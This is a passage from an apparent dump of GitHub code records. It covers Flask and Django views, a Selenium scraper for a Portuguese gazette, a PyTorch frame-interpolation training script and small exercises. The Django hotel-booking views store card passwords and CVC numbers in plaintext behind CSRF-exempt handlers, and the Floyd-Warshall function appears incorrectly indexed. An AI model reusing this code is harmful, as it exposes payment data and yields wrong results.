templates.append(template)\n return TemplateResponse(request, templates, context)\n","repo_name":"back1992/fireaws","sub_path":"web/frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69907181492","text":"from flask_app import app\nfrom flask import render_template, request, redirect\nfrom flask_app.models.dojo import Dojo\n\n@app.route('/dojos') \ndef dojos():\n dojos = Dojo.get_all() \n \n return render_template(\"dojos.html\", dojos = dojos)\n\n@app.route('/dojos/')\ndef dojo(dojoid):\n data = {\n \"id\":dojoid\n }\n dojo_from_database = Dojo.get_dojo_with_ninjas(data)\n \n return render_template(\"dojo.html\", dojo=dojo_from_database)\n\n@app.route('/dojos/create', methods=[\"POST\"])\ndef createdojo():\n data = {\n \"name\": request.form[\"dojo_name\"]\n }\n Dojo.create_dojo(data)\n return redirect('/dojos')","repo_name":"TheTechieYeti/Python","sub_path":"flask_mysql/crud/dojos_ninjas/flask_app/controllers/dojos.py","file_name":"dojos.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71615748854","text":"from itertools import product\ndef floyd_warshall(n, edge):\n\n rn = range(n)\n dist = [ [float('inf')] * n for i in rn]\n\n for i in rn:\n dist[i][i] = 0\n \n for src, dest, distance in edge:\n dist[src-1][dest-1] = distance\n \n for k, i, j in product(rn, repeat=3):\n new_dist = dist[i][j] + dist[j][k]\n if new_dist < dist[i][k]:\n dist[i][k] = new_dist\n\n return dist\n\n\ngrafo = [[1,2,1], [1,3,5], [1,4,6], [2,1,1], [2,3,1], [3,1,5], [3,2,1], [3,4,1], [4,1,6], [4,3,1]]\nprint(floyd_warshall(4, grafo))\n","repo_name":"fernandozanutto/competitive_programming","sub_path":"algorithms/grafos/floyd_warshall.py","file_name":"floyd_warshall.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"1825445066","text":"# Write a python program to find the sum of the first n positive integers.\n\ndef find_sum_integers(numbers):\n temp = 0\n for num in numbers:\n if(num>0):\n temp = temp + num\n else:\n break\n return temp\n\nprint(find_sum_integers([2,3,4,5,-1,2,3,4,5]))\nprint(find_sum_integers([2,3,4,5,1,2,3,4,5]))\n\n#w3source' answer\nn = 8\nsum_num = (n * (n + 1)) / 2\nprint(sum_num)","repo_name":"hasanyucel/PythonProjects","sub_path":"Applications/Basics/Basic-058.py","file_name":"Basic-058.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7866873201","text":"import functools\nimport json\nimport os\nimport shlex\n\nimport toml\nimport yaml\n\n# while we want to keep this miminal, the common class contains some useful functions usable by many providers.\n\nclass Singleton(type):\n _instances = {}\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\ndef memoize(func):\n \"\"\"\n The second time the decorated function is called, return the previous response value\n versus calling the function.\n \"\"\"\n cache = func.cache = {}\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n return memoized_func\n\ndef shlex_kv(msg):\n data = shlex.split(msg)\n results = dict()\n for item in data:\n if '=' in item:\n (k,v) = item.split(\"=\",1)\n results[k] = v\n else:\n raise Exception(\"invalid input: %s\" % data)\n return results\n\ndef load_data_file(path):\n path = os.path.abspath(os.path.expanduser(os.path.expandvars(path)))\n if not os.path.exists(path):\n raise Exception(\"path does not exist: %s\" % path)\n if path.endswith(\".toml\"):\n return toml.load(path)\n elif path.endswith(\".json\"):\n fd = open(path)\n return json.loads(fd.read())\n elif path.endswith(\".yaml\"):\n fd = open(path)\n data = yaml.safe_load(fd.read())\n return data\n else:\n raise Exception(\"unknown extension: %s\" % path)\n","repo_name":"opsmop/opsmop","sub_path":"opsmop/core/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":708,"dataset":"github-code","pt":"21"} +{"seq_id":"29684088441","text":"BOT_NAME = 'brsspa'\n\nSPIDER_MODULES = ['brsspa.spiders']\nNEWSPIDER_MODULE = 'brsspa.spiders'\nFEED_EXPORT_ENCODING = 'utf-8'\nLOG_LEVEL = 'ERROR'\nDOWNLOAD_DELAY = 0\n\nROBOTSTXT_OBEY = True\n\nITEM_PIPELINES = {\n\t'brsspa.pipelines.BrsspaPipeline': 100,\n\n}","repo_name":"hristo-grudev/brsspa","sub_path":"brsspa/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16120546315","text":"from django.shortcuts import render, HttpResponse, redirect, get_object_or_404\nfrom django.views.generic import ListView, FormView, View, DeleteView\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils import timezone\nfrom datetime import datetime\nimport json\nfrom django.http import JsonResponse, HttpResponse\nfrom django.forms.models import model_to_dict\n\nfrom .models import Room, Booking, Bill\nfrom .forms import AvailabilityForm\nfrom RoomApp.booking_functions.available import check_availability\nfrom django.views.decorators.csrf import csrf_exempt\nfrom UserApp.models import Guest\nfrom django.db.models import Q\n\nimport os\n\n# from sendgrid import SendGridAPIClient\n# from sendgrid.helpers.mail import Mail\n# Create your views here.\ndef main(request):\n\n return render(request, \"reserve_main.html\", {})\n\n\ndef get_reserve_context(category, check_in, check_out):\n period = int(check_out.replace(\"-\", \"\")) - int(check_in.replace(\"-\", \"\"))\n price = 0\n room_price = 0\n tax = 0\n category_name = \"\"\n if category == \"STD\":\n room_price = 200000\n category_name = \"스탠다드룸\"\n elif category == \"SUP\":\n room_price = 280000\n category_name = \"슈페리어룸\"\n elif category == \"DEL\":\n category_name = \"디럭스룸\"\n room_price = 375000\n elif category == \"EXC\":\n category_name = \"이그제큐티브룸\"\n room_price = 450000\n elif category == \"STE\":\n category_name = \"스위트룸\"\n room_price = 500000\n price = room_price * period\n tax = int(price / 10)\n context = {\n \"category_name\": category_name,\n \"room_price\": room_price,\n \"price\": (price + tax),\n \"tax\": tax,\n \"period\": period,\n }\n return context\n\n\ndef get_category_by_room_ID(roomID):\n if roomID[0] == \"2\":\n return \"STD\"\n elif roomID[0] == \"3\":\n return \"SUP\"\n elif roomID[0] == \"4\":\n return \"DEL\"\n elif roomID[0] == \"5\":\n return \"EXC\"\n elif roomID[0] == \"6\":\n return \"STE\"\n\n\n@csrf_exempt\ndef reserve_complete(request):\n booking_room_id = request.session.get(\"num\")[:3]\n category = get_category_by_room_ID(str(booking_room_id))\n print(category)\n check_in = request.session.get(\"check_in\")[0]\n check_out = request.session.get(\"check_out\")[0]\n find_room_num = Room.objects.filter(room_id=booking_room_id)[0]\n ex = request.POST.get(\"card_experiment\")\n experiment = ex.replace(\"/\", \"\")\n num = request.POST.get(\"card_password\")\n num_save = num.replace(\"-\", \"\")\n Bill.objects.get_or_create(\n bill_room=find_room_num,\n card_password=num_save,\n card_cvc_num=request.POST.get(\"card_cvc_num\", \"\"),\n card_experiment=experiment,\n )\n booking_user_id = request.session.get(\"user\")\n booking = Booking.objects.get_or_create(\n booking_roomid=Room.objects.get(room_id=booking_room_id),\n booking_userid=Guest.objects.get(site_id=booking_user_id),\n check_in=check_in,\n check_out=check_out,\n )\n context = get_reserve_context(category, check_in, check_out)\n context[\"check_in\"] = check_in\n context[\"check_out\"] = check_out\n context[\"reserve_id\"] = booking[0].id\n return render(request, \"reserve_complete.html\", context)\n\n\n@csrf_exempt\ndef checkIn(request):\n json_data = json.loads(request.body)\n room = Room.objects.get(room_id=json_data[\"room_id\"])\n room.on_use = True\n room.save()\n room = model_to_dict(room)\n return JsonResponse({\"room\": room}, status=201)\n\n\ndef getBookingInfo(request):\n json_data = json.loads(request.body)\n date = json_data[\"date\"]\n room = Room.objects.get(room_id=json_data[\"room_id\"])\n booking = Booking.objects.get(\n booking_roomid=room.id, check_in__lte=date, check_out__gte=date\n )\n user = Guest.objects.get(pk=booking.booking_userid_id)\n booking = model_to_dict(booking)\n user = model_to_dict(user)\n return JsonResponse({\"booking\": booking, \"user\": user}, status=201)\n\n\n@csrf_exempt\ndef liveReservationStatusView(request):\n rooms = Room.objects.all().values()\n date = request.POST.get(\"Date\", timezone.now())\n if isinstance(date, str):\n date = datetime.strptime(date, \"%Y-%m-%d\")\n date = timezone.make_aware(date)\n for room in rooms:\n checked_in = Booking.objects.filter(\n booking_roomid=room[\"id\"], check_in__lte=date, check_out__gte=date\n )\n room[\"checked_in\"] = len(checked_in) != 0\n room[\"is_using\"] = len(checked_in) != 0 and room[\"on_use\"]\n return render(\n request,\n \"live_reservation_status.html\",\n {\"selected_date\": str(date), \"rooms\": rooms},\n )\n\n\ndef RoomListView(request):\n rooms = Room.objects.all()[:]\n bookings = Booking.objects.all()[:]\n\n check_in = (request.POST[\"check_in\"],)\n check_out = (request.POST[\"check_out\"],)\n request.session[\"check_in\"] = check_in\n request.session[\"check_out\"] = check_out\n\n check_in_date = int(request.POST[\"check_in\"].replace(\"-\", \"\"))\n check_out_date = int(request.POST[\"check_out\"].replace(\"-\", \"\"))\n room_categories = dict(Room.room_type)\n room_list = []\n for room_category in room_categories:\n room = room_categories.get(room_category)\n room_url = reverse(\n \"roomapp:Reserve\",\n kwargs={\n \"category\": room_category,\n },\n )\n\n room_list.append((room, room_url))\n context = {\"room_list\": room_list, \"check_in\": check_in, \"check_out\": check_out}\n\n return render(\n request,\n \"reserve_list.html\",\n {\n \"check_in\": check_in,\n \"check_out\": check_out,\n \"room_list\": room_list,\n \"bookings\": bookings,\n \"context\": context,\n },\n )\n\n\n@csrf_exempt\ndef Reserve(request, category):\n print(category)\n check_in = request.session.get(\"check_in\")[0]\n check_out = request.session.get(\"check_out\")[0]\n if (check_in[0] == check_in[-1]) and check_in.startswith((\"'\", '\"')):\n check_in = check_in[1:-1]\n if (check_out[0] == check_out[-1]) and check_out.startswith((\"'\", '\"')):\n check_out = check_out[1:-1]\n # print(check_in, check_out)\n # check_in_date = str(int(check_in.replace(\"-\", \"\")) - 1)\n # check_out_date = str(int(check_out.replace(\"-\", \"\")) + 1)\n # check_in_in = check_in_date[:4] + \"-\" + check_in_date[4:6] + \"-\" + check_in_date[6:]\n # check_out_out = (\n # check_out_date[:4] + \"-\" + check_out_date[4:6] + \"-\" + check_out_date[6:]\n # )\n # print(check_in_in)\n\n booking_room = list(Room.objects.filter(category=category).values(\"room_id\"))\n print(booking_room)\n index = 0\n # for i in range(len(booking_room)):\n # room_num = list(booking_room[i].values())[0]\n # if Booking.objects.filter(\n # (Q(booking_roomid=room_num) & Q(check_in__range=[check_in, check_out]))\n # | (Q(booking_roomid=room_num) & Q(check_out__range=[check_in, check_out]))\n # ).exists():\n # index += 1\n # print(\"roooooom\", room_num, check_in, check_out)\n # else:\n # print(\"안됐다^^\", \"index=\", index)\n # break\n booking_room_id = Room.objects.filter(category=category)[index]\n booking_room_num = str(booking_room_id)\n request.session[\"num\"] = booking_room_num\n print(\"qpqpqpqpqpqpqp\", request.session[\"num\"])\n # booking_room_room = booking_room_id.values\n return render(\n request, \"reserve.html\", get_reserve_context(category, check_in, check_out)\n )\n\n\nclass BookingListView(ListView):\n model = Booking\n template_name = \"booking_list_view.html\"\n\n def get_queryset(self, *args, **kwargs):\n if self.request.user.is_staff:\n booking_list = Booking.objects.all()\n return booking_list\n else:\n booking_list = Booking.objects.filter(user=self.request.user)\n return booking_list\n\n\nclass CancelBookingView(DeleteView):\n model = Booking\n template_name = \"booking_cancel_view.html\"\n success_url = reverse_lazy(\"hotel:BookingListView\")\n","repo_name":"HyeseonLee/hotel-db-system","sub_path":"hotel-db-system/RoomApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23133903642","text":"# -*- coding:utf-8 -*-\n# @Author : Cheng\n# @Time : 2022/5/16 17:13\nfrom typing import List\n\n\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> bool:\n dp = [False for _ in range(len(s) + 1)]\n dp[0] = True\n for i in range(1, len(s) + 1):\n for word in wordDict:\n dp[i] = dp[i] or (dp[i - len(word)] and s[i - len(word):i] == word)\n return dp[-1]\n\n\nif __name__ == '__main__':\n s = \"applepenapple\"\n wordDict = [\"apple\", \"pen\"]\n solution = Solution()\n print(solution.wordBreak(s, wordDict))\n","repo_name":"chengcct/Algorithmic-exercises","sub_path":"leetcode/139. 单词拆分.py","file_name":"139. 单词拆分.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9034959880","text":"import math\nfrom time import sleep\n\nimport typer\nfrom rich import print\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom app.utils import create_pdf_name\n\n\ndef extract_data_from_search_page(date_start: str, date_end: str) -> dict:\n \"\"\"Extract data from search page of the site diariodarepublica.pt\n for file.csv\n param date_start: initial date search.\n param date_end: end date search.\n - `format date = \"AAAA-MM-DD\"`\n \"\"\"\n\n print(f\"Search range | {date_start} | {date_end} |\")\n\n # Dict model data\n data = {\n \"search_range\": [], # search range\n \"description\": [], # description\n \"link_page\": [], # link page 'despacho'\n \"link_pdf\": [], # link page file download\n \"name_pdf\": [], # name pdf file\n \"published\": [], # published date\n }\n\n # Config webdriver\n options = webdriver.FirefoxOptions()\n # options.add_argument('--headless')\n\n # Instance\n browser = webdriver.Firefox(options=options)\n\n # Get initial\n url = \"https://diariodarepublica.pt/dr/home\"\n browser.get(url)\n\n print(f\"Digging up information from '{url}'\")\n\n sleep(3)\n\n # Search\n text_for_research = \"\"\"Concede o estatuto de igualdade de direitos\n e deveres a vários cidadãos brasileiros\n \"\"\"\n\n input_place = browser.find_element(\n By.TAG_NAME, \"input\"\n ) # Find the search box\n input_place.send_keys(f'\"{text_for_research}\"') # Insert text\n\n buttom_search = browser.find_element(\n By.ID, \"b2-b2-myButton2\"\n ) # Find the buttom submit\n buttom_search.click() # Submit\n\n sleep(3)\n\n # Search filter\n checkbox_legislacao = browser.find_elements(\n By.CLASS_NAME, \"checkbox\"\n ) # Find the checkbox 'Legislação'\n checkbox_legislacao[1].click() # Check\n\n sleep(3)\n\n checkbox_serie_plus = browser.find_element(\n By.XPATH, \"//*[@id='Serie_Titulo']/div[1]/span\"\n ) # Find area to expand option 'Série'\n checkbox_serie_plus.click()\n\n sleep(2)\n\n checkbox_serie = browser.find_elements(\n By.CLASS_NAME, \"checkbox\"\n ) # Find the checkbox 'Série II'\n if len(checkbox_serie) == 4:\n checkbox_serie[3].click() # Check\n else:\n checkbox_serie[4].click() # Check\n\n sleep(2)\n\n # Filter date start\n date_published = browser.find_element(\n By.ID, \"Input_dataPublicacaoDe\"\n ) # Find box filter date\n date_published.send_keys(date_start) # Insert date fmt AAAA-MM-DD\n exit_calendar = browser.find_element(\n By.XPATH, \"//*[@id='FiltrarResultados']/div[1]/span\"\n )\n exit_calendar.click()\n\n # Filter date end\n date_published = browser.find_element(\n By.ID, \"Input_DataPublicacaoAte\"\n ) # Find box filter date\n date_published.send_keys(date_end) # Insert date fmt AAAA-MM-DD\n exit_calendar.click()\n date_published_submit = browser.find_element(\n By.XPATH, \"//*[@id='Pesquisa2']/div[3]/button/span\"\n )\n date_published_submit.click()\n\n sleep(2)\n\n # Check length pages\n\n length_search = browser.find_elements(By.CLASS_NAME, \"OSFillParent\")\n\n length_search_number = (\n length_search[13] if len(length_search) > 13 else length_search[10]\n )\n length_search_number = length_search_number.text.split(\" \")[0]\n length_search_number = int(length_search_number)\n\n # Check result search\n if length_search_number == 0:\n print(\"[bold red]No information found for scraping![/bold red]\")\n browser.quit()\n return data\n\n total_pages = math.ceil(length_search_number / 25)\n\n # Expand results 200 [disabled]\n # if length_search_number > 25:\n # print(\"expandir lista\")\n # expand_list = browser.find_element(\n # By.XPATH,\n # \"//*[@id='ResultadosEncontrados']/div[2]/div[2]/div/div/span\",\n # )\n # expand_list.click()\n # select_200_items = browser.find_element(\n # By.XPATH,\n # \"//*[@id='transitionContainer']/div/div[2]/div/div/div[3]/a/span\",\n # )\n # select_200_items.click()\n # sleep(2)\n\n # Data extraction\n\n # Navigate between the pages\n i = total_pages # initial countdown\n x = 0 # initial count get items\n p = 0 # initial count pages in for\n\n print(f\"Found {length_search_number} items in {total_pages} pages.\")\n\n for page in range(total_pages):\n body_results = browser.find_element(\n By.ID, \"ListaResultados\"\n ) # Find data\n list_href_page = body_results.find_elements(\n By.CLASS_NAME, \"title\"\n ) # Find element in data (create list)\n\n p += 1\n\n # Collects links from the current page\n print(\n f\"\"\"Digging data (description - link page - name pdf)\n in page {p}/{total_pages}\n \"\"\"\n )\n with typer.progressbar(\n list_href_page, label=\"Collecting \"\n ) as list_href_page:\n for item_href in list_href_page:\n link_page = item_href.get_attribute(\n \"href\"\n ) # Link for page 'despacho'\n text_page = item_href.find_element(\n By.CSS_SELECTOR, \"span\"\n ).text # Extraction text 'despacho'\n name_pdf = create_pdf_name(text_page)\n\n data[\"search_range\"].append(f\"[{date_start}]-[{date_end}]\")\n data[\"description\"].append(text_page)\n data[\"link_page\"].append(link_page)\n data[\"name_pdf\"].append(name_pdf)\n\n length = len(text_page)\n index_start = length - 10\n data[\"published\"].append(text_page[index_start:])\n\n x += 1\n\n print(f\"\\nCollected {x} items\")\n\n i -= 1 # countdown\n\n # next page\n if total_pages > 1 and i != 0:\n next_page = browser.find_element(By.ID, \"b27-Next\")\n next_page.click()\n sleep(2)\n\n # Extract link PDF\n total = length_search_number\n print(\"Digging data (link pdf)\")\n with typer.progressbar(data[\"link_page\"], label=\"Collecting \") as progress:\n for link in progress:\n # Get link page 'despacho'\n browser.get(f\"{link}\")\n\n sleep(2)\n\n list_elements_page_download = browser.find_elements(\n By.CLASS_NAME, \"ThemeGrid_MarginGutter\"\n ) # List of elements in page\n download_link_pdf = list_elements_page_download[-1].get_attribute(\n \"href\"\n ) # Extraction link file pdf\n\n data[\"link_pdf\"].append(download_link_pdf)\n\n # progress.update(total)\n\n print(f\"\\nCollected {total}.\")\n\n # Close webdriver\n browser.quit()\n\n return data\n","repo_name":"joseevilasio/cplp-data","sub_path":"app/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31230876182","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport models\nimport datas\nimport configs\n\n# import configs.c1\nimport argparse\nimport torch\nimport torchvision\nimport torchvision.transforms as TF\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport time\nimport os\nfrom math import log10\nimport numpy as np\nimport datetime\nfrom config import Config\nfrom tensorboardX import SummaryWriter\nimport sys\n\nimport cv2\n# import torchvision.utils.transforms as TF\n\n# prepare perceptual loss\nvgg16 = torchvision.models.vgg16(pretrained=True)\nvgg16_conv_4_3 = nn.Sequential(*list(vgg16.children())[0][:22]).cuda()\nvgg16_conv_4_3 = nn.DataParallel(vgg16_conv_4_3.cuda())\n\ndef build_gauss_kernel(size=5, sigma=1.0, n_channels=1, cuda=False):\n if size % 2 != 1:\n raise ValueError(\"kernel size must be uneven\")\n grid = np.float32(np.mgrid[0:size, 0:size].T)\n gaussian = lambda x: np.exp((x - size // 2) ** 2 / (-2 * sigma ** 2)) ** 2\n kernel = np.sum(gaussian(grid), axis=2)\n kernel /= np.sum(kernel)\n # repeat same kernel across depth dimension\n kernel = np.tile(kernel, (n_channels, 1, 1))\n # conv weight should be (out_channels, groups/in_channels, h, w),\n # and since we have depth-separable convolution we want the groups dimension to be 1\n kernel = torch.FloatTensor(kernel[:, None, :, :])\n if cuda:\n kernel = kernel.cuda()\n return Variable(kernel, requires_grad=False)\n\n\ndef conv_gauss(img, kernel):\n \"\"\" convolve img with a gaussian kernel that has been built with build_gauss_kernel \"\"\"\n n_channels, _, kw, kh = kernel.shape\n img = F.pad(img, (kw // 2, kh // 2, kw // 2, kh // 2), mode='replicate')\n return F.conv2d(img, kernel, groups=n_channels)\n\n\ndef laplacian_pyramid(img, kernel, max_levels=5):\n current = img\n pyr = []\n\n for level in range(max_levels):\n filtered = conv_gauss(current, kernel)\n diff = current - filtered\n pyr.append(diff)\n current = F.avg_pool2d(filtered, 2)\n\n pyr.append(current)\n return pyr\n\n\nclass LapLoss(nn.Module):\n def __init__(self, max_levels=5, k_size=5, sigma=2.0):\n super(LapLoss, self).__init__()\n self.max_levels = max_levels\n self.k_size = k_size\n self.sigma = sigma\n self._gauss_kernel = None\n\n def forward(self, input, target):\n if self._gauss_kernel is None or self._gauss_kernel.shape[1] != input.shape[1]:\n self._gauss_kernel = build_gauss_kernel(\n size=self.k_size, sigma=self.sigma,\n n_channels=input.shape[1], cuda=input.is_cuda\n )\n pyr_input = laplacian_pyramid(input, self._gauss_kernel, self.max_levels)\n pyr_target = laplacian_pyramid(target, self._gauss_kernel, self.max_levels)\n return sum(F.l1_loss(a, b) for a, b in zip(pyr_input, pyr_target))\n\n# loss function\ndef lossfn(outputs, I1, I2, IT):\n It_warp, I1t, I2t, I1_warp, I2_warp, F12, F21, I1tf, I2tf, M, dFt1, dFt2, Ft1, Ft2, Ft1r, Ft2r, _, _, _, _ = outputs\n \n recnLoss = F.l1_loss(It_warp, IT)\n\n LapLoss_module = LapLoss()\n laplacian_loss = LapLoss_module(It_warp, IT)\n\n loss = 5 * laplacian_loss + 10 * recnLoss\n\n return loss\n\n\ndef get_lr(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\n\n\n# loading configures\nparser = argparse.ArgumentParser()\nparser.add_argument('--config')\nargs = parser.parse_args()\n# args = parser.parse_config()\n\nconfig = Config.from_file(args.config)\n\n# preparing datasets\nnormalize1 = TF.Normalize(config.mean, [1.0, 1.0, 1.0])\nnormalize2 = TF.Normalize([0, 0, 0], config.std)\ntrans = TF.Compose([TF.ToTensor(), normalize1, normalize2, ])\n\nrevmean = [-x for x in config.mean]\nrevstd = [1.0/x for x in config.std]\nrevnormalize1 = TF.Normalize([0.0, 0.0, 0.0], revstd)\nrevnormalize2 = TF.Normalize(revmean, [1.0, 1.0, 1.0])\nrevNormalize = TF.Compose([revnormalize1, revnormalize2])\n\nrevtrans = TF.Compose([revnormalize1, revnormalize2, TF.ToPILImage()])\n\ntrainset = getattr(datas, config.trainset)(config.trainset_root, trans, config.train_size, config.train_crop_size)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=config.train_batch_size, shuffle=True, num_workers=32)\n\nvalidationset = getattr(datas, config.validationset)(config.validationset_root, trans, config.validation_size, config.validation_crop_size)\nvalidationloader = torch.utils.data.DataLoader(validationset, batch_size=1, shuffle=False, num_workers=8)\n\nprint(validationset)\n\n\n# model\nmodel = getattr(models, config.model)(config.pwc_path).cuda()\nmodel = nn.DataParallel(model)\n\n# optimizer\noptim_params = []\nfor k, v in model.module.named_parameters():\n if v.requires_grad:\n optim_params.append(v)\n else:\n print('Params [{:s}] will not optimize.'.format(k))\n\n#params = list(model.module.refinenet.parameters()) + list(model.module.masknet.parameters())\noptimizer = optim.Adam(optim_params, lr=config.init_learning_rate)\n\n# scheduler to decrease learning rate by a factor of 10 at milestones.\nscheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=config.milestones, gamma=0.1)\nrecorder = SummaryWriter(config.record_dir)\n\nprint('Everything prepared. Ready to train...')\nprint('We print training logs after each epoch, so it dose take a while to show the logs.')\nprint('We use 4 GTX 2080Ti GPUs to train the model. About 3600s for one epoch. The training procedure lasts about 3-5 days.')\n\nto_img = TF.ToPILImage()\n\ndef validate():\n retImg = []\n # For details see training.\n # slomo = slomo.eval()\n psnr = 0\n psnrs = [0 , 0, 0]\n tloss = 0\n tlosses = [0, 0, 0]\n flag = True\n retImg = []\n\n with torch.no_grad():\n\n for validationIndex, validationData in enumerate(validationloader, 0):\n # if validationIndex > 10:\n # break\n\n # frame0, frame1, frameT, frame2, frame3 = validationData\n frame0, frame1, frameT1, frameT2, frameT3, frame2, frame3 = validationData\n\n ITs = [frameT1.cuda(), frameT2.cuda(), frameT3.cuda()]\n\n I0 = frame0.cuda()\n I1 = frame1.cuda()\n I2 = frame2.cuda()\n I3 = frame3.cuda()\n\n It_warps = []\n Ms = []\n\n for tt in range(3):\n IT = ITs[tt]\n\n outputs = model(I0, I1, I2, I3, tt/4.0 + 0.25)\n It_warp, I1t, I2t, I1_warp, I2_warp, F12, F21, I1tf, I2tf, M, dFt1, dFt2, Ft1, Ft2, Ft1r, Ft2r, _, _, _, _ = outputs\n\n\n It_warps.append(It_warp)\n Ms.append(M)\n\n\n loss = lossfn(outputs, I1, I2, IT)\n tlosses[tt] += loss.item()\n\n #psnr\n MSE_val = F.mse_loss(It_warp, IT)\n psnrs[tt] += (10 * log10(1 / MSE_val.item()))\n \n\n img_grid = []\n img_grid.append(revNormalize(frame1[0]))\n for tt in range(3):\n img_grid.append(Ms[tt].cpu()[0])\n img_grid.append(revNormalize(It_warps[tt].cpu()[0]))\n img_grid.append(revNormalize(frame2[0]))\n\n retImg.append(torchvision.utils.make_grid(img_grid, nrow=10, padding=10))\n\n for tt in range(3):\n psnrs[tt] /= len(validationloader)\n tlosses[tt] /= len(validationloader)\n\n\n # slomo = slomo.train()\n return psnrs, tlosses, retImg\n\ndef train():\n\n if config.train_continue: \n dict1 = torch.load(config.checkpoint)\n model.load_state_dict(dict1['model_state_dict'])\n print('Continue Training:', config.checkpoint)\n else:\n dict1 = {'loss': [], 'valLoss': [], 'valPSNR': [], 'epoch': -1}\n\n if not os.path.exists(config.checkpoint_dir):\n os.mkdir(config.checkpoint_dir)\n\n start = time.time()\n cLoss = dict1['loss']\n valLoss = dict1['valLoss']\n valPSNR = dict1['valPSNR']\n checkpoint_counter = 0\n\n\n for epoch in range(dict1['epoch'] + 1, config.epochs):\n\n print(\"Epoch: \", epoch)\n\n # Append and reset\n cLoss.append([])\n valLoss.append([])\n valPSNR.append([])\n iLoss = 0\n\n # Increment scheduler count\n scheduler.step()\n\n trainFrameIndex = 3\n for trainIndex, (trainData, t) in enumerate(trainloader, 0):\n # if trainIndex >= 200:\n # break\n # print(\"Training iteration [{}/{}]\".format(trainIndex, len(trainloader)))\n # sys.stdout.flush()\n ## Getting the input and the target from the training set\n frame0, frame1, frameT, frame2, frame3 = trainData\n\n\n I0 = frame0.cuda()\n I1 = frame1.cuda()\n I2 = frame2.cuda()\n I3 = frame3.cuda()\n IT = frameT.cuda()\n t = t.view(t.size(0,), 1, 1, 1).float().cuda()\n\n optimizer.zero_grad()\n outputs = model(I0, I1, I2, I3, t)\n loss = lossfn(outputs, I1, I2, IT)\n loss.backward()\n optimizer.step()\n\n iLoss += loss.item()\n\n if epoch % 2 == 0:\n end = time.time()\n\n psnrs, vLosses, valImgs = validate()\n\n psnr = np.mean(psnrs)\n vLoss = np.mean(vLosses)\n\n valPSNR[epoch].append(np.mean(psnrs))\n valLoss[epoch].append(np.mean(vLosses))\n\n # Tensorboard\n itr = trainIndex + epoch * (len(trainloader))\n\n recorder.add_scalars('Loss', {'trainLoss': iLoss / len(trainloader), 'validationLoss': vLoss}, itr)\n recorder.add_scalar('PSNR', psnr, itr)\n\n vtdict = {}\n psnrdict = {}\n for tt in range(3):\n vtdict['validationLoss' + str(tt + 1)] = vLosses[tt]\n psnrdict['PSNR' + str(tt + 1)] = psnrs[tt]\n\n recorder.add_scalars('Losst', vtdict, itr)\n recorder.add_scalars('PSNRt', psnrdict, itr)\n\n # for vi, valImg in enumerate(valImgs):\n # recorder.add_image('Validation' + str(vi), valImg , itr)\n\n endVal = time.time()\n\n print(\n \" Loss: %0.6f Iterations: %4d/%4d TrainExecTime: %0.1f ValLoss:%0.6f ValPSNR: %0.4f ValEvalTime: %0.2f LearningRate: %f\" % (\n iLoss / config.progress_iter, trainIndex, len(trainloader), end - start, vLoss, psnr, endVal - end,\n get_lr(optimizer)))\n sys.stdout.flush()\n\n cLoss[epoch].append(iLoss / len(trainloader))\n iLoss = 0\n start = time.time()\n\n # Create checkpoint after every `config.checkpoint_epoch` epochs\n if (epoch >config.min_save_epoch):\n dict1 = {\n 'Detail':\"Acceleration Aware Frame Interpolation.\",\n 'epoch':epoch,\n 'timestamp':datetime.datetime.now(),\n 'trainBatchSz':config.train_batch_size,\n 'validationBatchSz':1,\n 'learningRate':get_lr(optimizer),\n 'loss':cLoss,\n 'valLoss':valLoss,\n 'valPSNR':valPSNR,\n 'model_state_dict': model.state_dict(),\n }\n torch.save(dict1, config.checkpoint_dir + \"/AcSloMo\" + str(epoch) + \".ckpt\")\n checkpoint_counter += 1\n\n\ntrain()\n","repo_name":"lyh-18/EQVI","sub_path":"train_EQVI_lap_l1.py","file_name":"train_EQVI_lap_l1.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"21"} +{"seq_id":"35431569341","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 16 14:58:13 2019\r\n\r\n@author: Wayne Monteiro\r\n\"\"\"\r\nfrom PIL import Image\r\n\r\nWALL = 0\r\nPATH = 1\r\n\r\nCOLORS = {\r\n WALL: (0, 0, 0),\r\n PATH: (255, 255, 255),\r\n\r\n}\r\ndef set_color(img, x0, y0, dim, 